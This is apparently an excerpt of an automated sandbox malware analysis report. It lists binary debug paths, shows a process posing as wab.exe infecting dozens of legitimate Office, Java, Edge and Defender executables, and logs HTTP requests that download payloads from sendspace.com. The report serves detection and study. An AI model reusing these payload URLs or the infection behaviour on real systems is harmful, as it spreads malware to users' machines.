              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdb source: PerfBoost.exe.8.dr
              Source: Binary string: wab.pdbGCTL source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: msoev.exe.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1992900389.0000000007945000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
              Source: Binary string: wab.pdb source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SCANPST.EXE.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: LICLUA.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.8.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
              Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.8.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr, java.exe0.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdbb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: PerfBoost.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb source: SETLANG.EXE.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@g source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb source: SCANPST.EXE.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SETLANG.EXE.8.dr

              Spreading

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
              Source: Joe Sandbox ViewIP Address: 172.67.170.105 172.67.170.105
              Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/wlorhs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n2.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/g1h76h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n4.sendspace.comConnection: Keep-AliveCookie: SID=7snc8sd5begfi8v3gnpjgpo9j3
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/wlorhs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n2.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/g1h76h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
